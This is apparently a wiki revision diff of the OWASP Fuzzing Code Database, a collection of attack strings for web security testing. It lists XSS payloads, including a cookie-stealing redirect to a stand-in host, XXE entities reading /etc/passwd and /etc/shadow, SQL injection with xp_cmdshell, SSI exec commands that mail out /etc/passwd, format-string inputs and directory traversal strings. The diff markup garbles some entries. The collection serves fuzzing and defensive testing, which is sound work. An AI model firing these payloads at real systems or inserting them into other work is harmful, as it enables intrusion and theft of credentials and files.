"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"
"<A HREF=""h\ntt\tp://6"
+
"&lt;A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
+
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"
"<A HREF=""//google"">XSS</A>"
+
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://google.com/"">XSS</A>"
+
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://www.google.com./"">XSS</A>"
+
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
+
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
+
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"&{document.write(""XSS-XSS-XSS"");};"
+
"&amp;{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
+
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
+
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
+
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"
"<div style=""behaviour: url([link to code]);"">"
+
"&lt;div style=""behaviour: url([link to code]);""&gt;"
"<div style=""binding: url([link to code]);"">"
+
"&lt;div style=""binding: url([link to code]);""&gt;"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
+
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
+
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
+
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
+
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
+
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
+
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
+
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
+
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"
"<div style=""binding: url([link to code]);""> [Mozilla]"
+
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
+
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
+
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
+
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
+
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"
><script>
+
&gt;&lt;script&gt;
"<script>alert(""WXSS"")</script>"
+
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"
"<<script>alert(""WXSS"");//<</script>"
+
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"
<script>alert(document.cookie)</script>
+
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
'><script>alert(document.cookie)</script>
+
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
'><script>alert(document.cookie);</script>
+
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
 
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
 
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
 
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
 
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
 
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
 
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
+
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;
&ltscript&gtalert(document.cookie);&ltscript&gtalert
+
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert
<xss><script>alert('WXSS')</script></vulnerable>
+
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;
<IMG%20SRC='javascript:alert(document.cookie)'>
+
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;
"<IMG%20SRC=""javascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""javascript:alert('WXSS')"""
+
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
+
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;
<IMG%20SRC=javascript:alert(&quot;WXSS&quot;)>
+
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
+
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
+
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
<IMG%20SRC='javasc
+
&lt;IMG%20SRC='javasc
"<IMG%20SRC=""jav"
+
"&lt;IMG%20SRC=""jav"
"<IMG%20SRC=""jav&#x09;ascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""jav&#x0A;ascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav
"<IMG%20SRC=""jav&#x0D;ascript:alert('WXSS');"">"
+
ascript:alert('WXSS');""&gt;"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
+
"&lt;IMG%20SRC=""jav
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
+
ascript:alert('WXSS');""&gt;"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
+
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
+
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"
<IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+
&lt;IMG%20SRC=javascript:alert('XSS')&gt;
 +
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
 +
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
 
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
 
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
+
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;
 
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
 
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}
'';!--<XSS>=&{()}"
+
'';!--&lt;XSS&gt;=&amp;{()}"
</pre>
+
</pre>
 +
<br>  
  
 
+
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===
+
<pre>Statements
 
+
<pre>
+
Statements
+
 
count(/child::node())
 
count(/child::node())
 
x' or name()='username' or 'x'='y
 
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
+
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
+
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
+
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"
"<xml ID=""xss""><I><B>&lt;IMG SRC=""javas<!-- -->cript:alert('XSS')""&gt;</B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
</pre>
+
</pre>  
 
+
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28)===
+
<pre>%s%p%x%d
 
+
<pre>
+
%s%p%x%d
+
 
.1024d
 
.1024d
 
%.2049d
 
%.2049d
Line 703: Line 678:
 
%.16705u%2\$hn
 
%.16705u%2\$hn
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;
+
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;
</pre>
+
</pre>  
 
+
==== Project Contributor ====
==== Project Contributor ====
+
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]
+
  
Reviewer: [[:User:eneves|'''Eduardo Neves''']]
+
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]  
  
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]
+
Reviewer: [[:User:eneves|'''Eduardo Neves''']]  
  
==== Feedback and Participation ====
+
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]
  
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org
+
==== Feedback and Participation  ====
  
==== Project Identification ====
+
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org
  
[[Category:OWASP Project|Fuzzing Code Database]]
+
==== Project Identification  ====
[[Category:OWASP Document]]
+
[[Category:OWASP Alpha Quality Document]]
+
  
 
{{Template:OWASP Project Identification Tab
 
{{Template:OWASP Project Identification Tab
Line 815: Line 786:
 
| old_release_date5 =  
 
| old_release_date5 =  
 
| old_release_download_link5 =  
 
| old_release_download_link5 =  
}}  
+
}} __NOTOC__ <headertabs />  
__NOTOC__ <headertabs />
+
 
 +
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]

Revision as of 21:30, 3 February 2010

This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab, WebSlayer and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News

02 February 2010'

  • Created new Category Lotus/Notes Files

11 August 2009

  • Created new Category: XML Attacks

Update Statements

  • 15 new XML Statements
  • 93 new SQL Injections Statements
  • 67 new Traversal Directory Statements
  • Delete 33 XSS Statement Duplicate
  • 30 New XSS Statements

7 August 2009

  • Updated the objectives of the project.

21 July 2009

  • Set the team responsible for the project.

Goals

This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

Statements

Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)

/852566C90012664F
/admin4.nsf
/admin5.nsf
/admin.nsf
/agentrunner.nsf
/alog.nsf
/a_domlog.nsf
/bookmark.nsf
/busytime.nsf
/catalog.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/chatlog.nsf
/clbusy.nsf
/cldbdir.nsf
/clusta4.nsf
/collect4.nsf
/da.nsf
/dba4.nsf
/dclf.nsf
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/dirassist.nsf
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dspug.nsf
/events4.nsf
/events5.nsf
/events.nsf
/event.nsf
/homepage.nsf
/iNotes/Forms5.nsf/$DefaultNav
/jotter.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/log4a.nsf
/log.nsf
/l_domlog.nsf
/mab.nsf
/mail10.box
/mail1.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail.box
/msdwda.nsf
/mtatbls.nsf
/mtstore.nsf
/names.nsf
/nntppost.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/ntsync45.nsf
/perweb.nsf
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/reports.nsf
/sample/siregw46.nsf
/schema50.nsf
/setupweb.nsf
/setup.nsf
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtp.box
/smtp.nsf
/smvlog.nsf
/srvnam.htm
/statmail.nsf
/statrep.nsf
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/streg.nsf
/stsrc.nsf
/userreg.nsf
/vpuserinfo.nsf
/webadmin.nsf
/web.nsf
/.nsf/../winnt/win.ini
/?Open 

SQL Injection -(Update: 11 August 2009 - Total Statements: 126)

Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --

SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)

<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)

Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
